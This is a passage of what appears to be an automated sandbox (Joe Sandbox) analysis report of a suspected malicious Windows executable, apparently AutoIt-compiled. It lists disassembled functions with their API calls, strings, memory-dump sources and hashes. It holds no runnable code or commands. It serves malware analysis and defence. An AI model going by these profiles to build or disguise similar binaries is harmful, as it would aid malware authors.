                                              • Part of subcall function 00E3386C: _iswctype.LIBCMT ref: 00E33874
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                            • String ID: %s%u
                                            • API String ID: 3744389584-679674701
                                            • Opcode ID: 71dd08d8742f5eee938298cfc4741e736199177ecc196144a8acc6c89e442f34
                                            • Instruction ID: a81635cf90c448d035881533f0082a4b8df87f4fb18bcb0ca340024dc3e77157
                                            • Opcode Fuzzy Hash: 71dd08d8742f5eee938298cfc4741e736199177ecc196144a8acc6c89e442f34
                                            • Instruction Fuzzy Hash: 38A1D031A44306AFD714DF64D884BAAF7E8FF04389F08652AF999F2191D730E945CB92
                                            Function 00E6B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00E6B3DB
                                            • _wcscmp.LIBCMT ref: 00E6B3EC
                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E6B414
                                            • CharUpperBuffW.USER32(?,00000000), ref: 00E6B431
                                            • _wcscmp.LIBCMT ref: 00E6B44F
                                            • _wcsstr.LIBCMT ref: 00E6B460
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E6B498
                                            • _wcscmp.LIBCMT ref: 00E6B4A8
                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E6B4CF
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E6B518
                                            • _wcscmp.LIBCMT ref: 00E6B528
                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00E6B550
                                            • GetWindowRect.USER32(00000004,?), ref: 00E6B5B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                            • String ID: @$ThumbnailClass
                                            • API String ID: 1788623398-1539354611
                                            • Opcode ID: 44c977e0d5fe67ec490693331af062a892240a44069da1d510da39c1c82799f3
                                            • Instruction ID: ccf33febdeadd4427c81f6082846ae6950149ce84a7830947fd97eaca41aff70
                                            • Opcode Fuzzy Hash: 44c977e0d5fe67ec490693331af062a892240a44069da1d510da39c1c82799f3
                                            • Instruction Fuzzy Hash: 9981C4710443059FDB14DF10E885FAA7BE9EF44398F04A56AFD86EA092EB30DD85CB61
                                            Function 00E9C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DragQueryPoint.SHELL32(?,?), ref: 00E9C917
                                              • Part of subcall function 00E9ADF1: ClientToScreen.USER32(?,?), ref: 00E9AE1A
                                              • Part of subcall function 00E9ADF1: GetWindowRect.USER32(?,?), ref: 00E9AE90
                                              • Part of subcall function 00E9ADF1: PtInRect.USER32(?,?,00E9C304), ref: 00E9AEA0
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E9C980
                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E9C98B
                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E9C9AE
                                            • _wcscat.LIBCMT ref: 00E9C9DE
                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E9C9F5
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E9CA0E
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E9CA25
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E9CA47
                                            • DragFinish.SHELL32(?), ref: 00E9CA4E
                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E9CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                            • API String ID: 169749273-2073472848
                                            • Opcode ID: 2e285105d9a3432114009c7928d4e0ac7f9290cd3e8ed7735d6ffffcda8c7e6c
                                            • Instruction ID: 0bf259c3753010c555188c97a5d3e7e561d07368856a8f4d255fcd94849b9e9e
                                            • Opcode Fuzzy Hash: 2e285105d9a3432114009c7928d4e0ac7f9290cd3e8ed7735d6ffffcda8c7e6c
                                            • Instruction Fuzzy Hash: DD616A72108300AFC711EF65DC85D9FBBE8EFC8710F10192EF596A61A1DB709A49CB92
                                            Function 00E6B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 1038674560-1810252412
                                            • Opcode ID: 1396877eee38f927607181a22ff840d06336d3141f856c83344f28ec268de2e7
                                            • Instruction ID: 09ebbbcfb59c5e164c30897f7e64f6b8a692ba53265b21f7f5a229bf75308356
                                            • Opcode Fuzzy Hash: 1396877eee38f927607181a22ff840d06336d3141f856c83344f28ec268de2e7
                                            • Instruction Fuzzy Hash: 54316331684305E6DB14FA60DE57FEEBBF89F24B90F60202AF451B10E2EF626E85C551
                                            Function 00E6C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadIconW.USER32(00000063), ref: 00E6C4D4
                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E6C4E6
                                            • SetWindowTextW.USER32(?,?), ref: 00E6C4FD
                                            • GetDlgItem.USER32(?,000003EA), ref: 00E6C512
                                            • SetWindowTextW.USER32(00000000,?), ref: 00E6C518
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C528
                                            • SetWindowTextW.USER32(00000000,?), ref: 00E6C52E
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E6C54F
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E6C569
                                            • GetWindowRect.USER32(?,?), ref: 00E6C572
                                            • SetWindowTextW.USER32(?,?), ref: 00E6C5DD
                                            • GetDesktopWindow.USER32 ref: 00E6C5E3
                                            • GetWindowRect.USER32(00000000), ref: 00E6C5EA
                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E6C636
                                            • GetClientRect.USER32(?,?), ref: 00E6C643
                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E6C668
                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E6C693
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                            • String ID:
                                            • API String ID: 3869813825-0
                                            • Opcode ID: 69fe00d0b3bf16aec39c6a84f198ed1edcacfc99d5752ac2838d14cd257e0d2c
                                            • Instruction ID: 4f3a8c97d4529c54a6519ee378d99f818a32fcaca88c31a991887d1ef888eed9
                                            • Opcode Fuzzy Hash: 69fe00d0b3bf16aec39c6a84f198ed1edcacfc99d5752ac2838d14cd257e0d2c
                                            • Instruction Fuzzy Hash: 0B519E71900709AFDB20DFA9ED89B7EBBF5FF04744F10092AE686B25A1C774A944CB50
                                            Function 00E9A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E9A4C8
                                            • DestroyWindow.USER32(?,?), ref: 00E9A542
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E9A5BC
                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E9A5DE
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E9A5F1
                                            • DestroyWindow.USER32(00000000), ref: 00E9A613
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E10000,00000000), ref: 00E9A64A
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E9A663
                                            • GetDesktopWindow.USER32 ref: 00E9A67C
                                            • GetWindowRect.USER32(00000000), ref: 00E9A683
                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E9A69B
                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E9A6B3
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                            • String ID: 0$tooltips_class32
                                            • API String ID: 1297703922-3619404913
                                            • Opcode ID: d036878c5016878142ec525233eaadfe910023af38d734f7f7c73d1159084221
                                            • Instruction ID: e3d341373904766c24c3132b161c1afb76797aefcb488afe20d604863b15c89b
                                            • Opcode Fuzzy Hash: d036878c5016878142ec525233eaadfe910023af38d734f7f7c73d1159084221
                                            • Instruction Fuzzy Hash: 84718B71144305AFDB24CF28CC49FA67BE5EF88304F08452EF985A72A2D771E946DB92
                                            Function 00E94619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E946AB
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E946F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                            • API String ID: 3974292440-4258414348
                                            • Opcode ID: 452378c97ac835035acdb9d4025a9433a83af1d18d1b0c4148acf3b9063edef4
                                            • Instruction ID: b365608b98e3afb15a7724da84df604bc25951c3bb07ee4f5a9aac3d0209b914
                                            • Opcode Fuzzy Hash: 452378c97ac835035acdb9d4025a9433a83af1d18d1b0c4148acf3b9063edef4
                                            • Instruction Fuzzy Hash: 32912BB46043059BCB14EF10C461AAAB7E5AF89354F04646DF8967B3A3DB31ED4ACB81
                                            Function 00E9BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E9BB6E
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E99431), ref: 00E9BBCA
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E9BC03
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E9BC46
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E9BC7D
                                            • FreeLibrary.KERNEL32(?), ref: 00E9BC89
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E9BC99
                                            • DestroyIcon.USER32(?,?,?,?,?,00E99431), ref: 00E9BCA8
                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E9BCC5
                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E9BCD1
                                              • Part of subcall function 00E3313D: __wcsicmp_l.LIBCMT ref: 00E331C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                            • String ID: .dll$.exe$.icl
                                            • API String ID: 1212759294-1154884017
                                            • Opcode ID: 6365b2dbb2140d53171af110e8bdec134255144c30d57bf38c7598c3c8e52695
                                            • Instruction ID: ebcf892a6eb9232e96c6ff08162c06d2054cb11512e8de62114fdc099bc7a1f4
                                            • Opcode Fuzzy Hash: 6365b2dbb2140d53171af110e8bdec134255144c30d57bf38c7598c3c8e52695
                                            • Instruction Fuzzy Hash: 6561EF71600218BEEF14DF65DD86FBEBBA8EB08710F10521AF915F61C1DB70A994CBA0
                                            Function 00E7A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadStringW.USER32(00000066,?,00000FFF,00E9FB78), ref: 00E7A0FC
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E7A11E
                                            • __swprintf.LIBCMT ref: 00E7A177
                                            • __swprintf.LIBCMT ref: 00E7A190
                                            • _wprintf.LIBCMT ref: 00E7A246
                                            • _wprintf.LIBCMT ref: 00E7A264
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                            • API String ID: 311963372-1048875529
                                            • Opcode ID: bc4fdb0ef18548caa577bbfc4c7db9f1fdb7fcee71a739cb7cb39b2f3f6897d6
                                            • Instruction ID: e4596618c62403ba404c1ea28c47d4b4ca86717d4e373c90aaa962566df74e9f
                                            • Opcode Fuzzy Hash: bc4fdb0ef18548caa577bbfc4c7db9f1fdb7fcee71a739cb7cb39b2f3f6897d6
                                            • Instruction Fuzzy Hash: F5518172900209BBCF15EBE0DD46EEEB7B9AF08700F145165F515720A2EB316F99CB61
                                            Function 00E7A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CharLowerBuffW.USER32(?,?), ref: 00E7A636
                                            • GetDriveTypeW.KERNEL32 ref: 00E7A683
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A6CB
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A702
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A730
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                            • API String ID: 2698844021-4113822522
                                            • Opcode ID: 8ac85bad44836cf636bd1f8aea6edda81819e3a2de0b40382f9930fe81323944
                                            • Instruction ID: 52fec8996b7809bffcfa9edf5b858be5136ae2d6cbf69589dc32fa032106d1d7
                                            • Opcode Fuzzy Hash: 8ac85bad44836cf636bd1f8aea6edda81819e3a2de0b40382f9930fe81323944
                                            • Instruction Fuzzy Hash: 6B514F711043049FC704EF10C9919AEB7F5FF88718F08A96DF89A67251DB31AE4ACB52
                                            Function 00E7A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E7A47A
                                            • __swprintf.LIBCMT ref: 00E7A49C
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E7A4D9
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E7A4FE
                                            • _memset.LIBCMT ref: 00E7A51D
                                            • _wcsncpy.LIBCMT ref: 00E7A559
                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E7A58E
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7A599
                                            • RemoveDirectoryW.KERNEL32(?), ref: 00E7A5A2
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7A5AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                            • String ID: :$\$\??\%s
                                            • API String ID: 2733774712-3457252023
                                            • Opcode ID: 810cd9db12a5daef28795df69b571b1dcd5385eabaf085dd3eaf45a03edbd906
                                            • Instruction ID: 8925acb67a615b5507c29752037c069bf1fd8d02af150a2b7362599fb1d4ed39
                                            • Opcode Fuzzy Hash: 810cd9db12a5daef28795df69b571b1dcd5385eabaf085dd3eaf45a03edbd906
                                            • Instruction Fuzzy Hash: C831B0B2500209ABDB21DFA1DC49FEF37BCEF88705F1451B6FA08E2160E77096448B25
                                            Function 00E9C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E9C4EC
                                            • GetFocus.USER32 ref: 00E9C4FC
                                            • GetDlgCtrlID.USER32(00000000), ref: 00E9C507
                                            • _memset.LIBCMT ref: 00E9C632
                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E9C65D
                                            • GetMenuItemCount.USER32(?), ref: 00E9C67D
                                            • GetMenuItemID.USER32(?,00000000), ref: 00E9C690
                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E9C6C4
                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E9C70C
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E9C744
                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E9C779
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                            • String ID: 0
                                            • API String ID: 1296962147-4108050209
                                            • Opcode ID: 185c93613fac43089ccae8963bfc3a781e4400f0358422e3a18d5436828dc45a
                                            • Instruction ID: 42d4d485539976030eac85258b19c1d337ae20e678add6b5708a3a43899d74ce
                                            • Opcode Fuzzy Hash: 185c93613fac43089ccae8963bfc3a781e4400f0358422e3a18d5436828dc45a
                                            • Instruction Fuzzy Hash: 72818270108301AFDB10EF25D984AABBBE4FB88718F20592EF995A7291D770D945CF92
                                            Function 00E683F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                              • Part of subcall function 00E6874A: GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                              • Part of subcall function 00E6874A: GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                              • Part of subcall function 00E6874A: HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                              • Part of subcall function 00E687E7: GetProcessHeap.KERNEL32(00000008,00E68240,00000000,00000000,?,00E68240,?), ref: 00E687F3
                                              • Part of subcall function 00E687E7: HeapAlloc.KERNEL32(00000000,?,00E68240,?), ref: 00E687FA
                                              • Part of subcall function 00E687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E68240,?), ref: 00E6880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E68458
                                            • _memset.LIBCMT ref: 00E6846D
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E6848C
                                            • GetLengthSid.ADVAPI32(?), ref: 00E6849D
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E684DA
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E684F6
                                            • GetLengthSid.ADVAPI32(?), ref: 00E68513
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E68522
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E68529
